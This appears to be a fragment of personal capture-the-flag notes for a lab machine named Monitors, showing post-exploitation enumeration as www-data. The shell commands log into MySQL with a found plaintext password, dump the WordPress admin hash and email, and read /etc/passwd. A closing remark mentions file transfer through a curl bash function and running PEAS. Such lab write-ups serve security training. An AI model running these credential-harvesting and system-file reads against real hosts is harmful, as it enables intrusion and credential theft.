6 box enum www-data

www-data@monitors:/usr/share/cacti$ mysql -u wpadmin -p
Enter password: BestAdministrator@2020!
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wordpress          |
+--------------------+
2 rows in set (0.00 sec)

mysql> select user_login,user_pass, user_email from wp_users;
+------------+------------------------------------+-------------------+
| user_login | user_pass                          | user_email        |
+------------+------------------------------------+-------------------+
| admin      | $P$Be7cx.OsLozVI5L6DD60LLZNoHW9dZ0 | admin@monitor.htb |
+------------+------------------------------------+-------------------+
# we know admin pass; no need to crack

# checking the folder name, I tried so much,
www-data@monitors:/usr/share/cacti$ cd /var/www
www-data@monitors:/var/www$ ls -la
total 12
drwxr-xr-x  3 root     root     4096 Nov 10  2020 .
drwxr-xr-x 15 root     root     4096 Nov 10  2020 ..
drwxr-xr-x  5 www-data www-data 4096 Apr 21 20:19 wordpress

www-data@monitors:/var/www/wordpress$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:Marcus Haynes:/home/marcus:/bin/bash

had issues transferring files, no wget, curl used __curl bash function

PEAS

Last updated